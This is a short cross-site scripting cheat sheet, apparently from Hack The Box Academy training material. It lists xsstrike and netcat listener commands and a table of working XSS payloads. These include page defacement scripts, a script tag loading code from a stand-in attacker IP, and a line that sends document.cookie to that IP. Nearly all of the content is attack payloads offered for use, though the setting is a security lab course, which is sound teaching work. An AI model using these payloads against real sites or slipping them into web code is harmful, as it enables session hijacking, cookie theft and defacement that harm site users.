# XSS Cheat Sheet

### Commands

| Command                                                             | Description                       |
| ------------------------------------------------------------------- | --------------------------------- |
| `python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"` | Run `xsstrike` on a URL parameter |
| `sudo nc -lvnp 80`                                                  | Start `netcat` listener           |
| `sudo php -S 0.0.0.0:80`                                            | Start `PHP` server                |

### XSS Payloads

| Code                                                                                          | Description                   |
| --------------------------------------------------------------------------------------------- | ----------------------------- |
| `<script>alert(window.origin)</script>`                                                       | Basic XSS Payload             |
| `<plaintext>`                                                                                 | Basic XSS Payload             |
| `<script>print()</script>`                                                                    | Basic XSS Payload             |
| `<img src="" onerror=alert(window.origin)>`                                                   | HTML-based XSS Payload        |
| `<script>document.body.style.background = "#141d2b"</script>`                                 | Change Background Color       |
| `<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>` | Change Background Image       |
| `<script>document.title = 'HackTheBox Academy'</script>`                                      | Change Website Title          |
| `<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>`                | Overwrite website's main body |
| `<script>document.getElementById('urlform').remove();</script>`                               | Remove certain HTML element   |
| `<script src="http://OUR_IP/script.js"></script>`                                             | Load remote script            |
| `<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>`               | Send cookie details to us     |
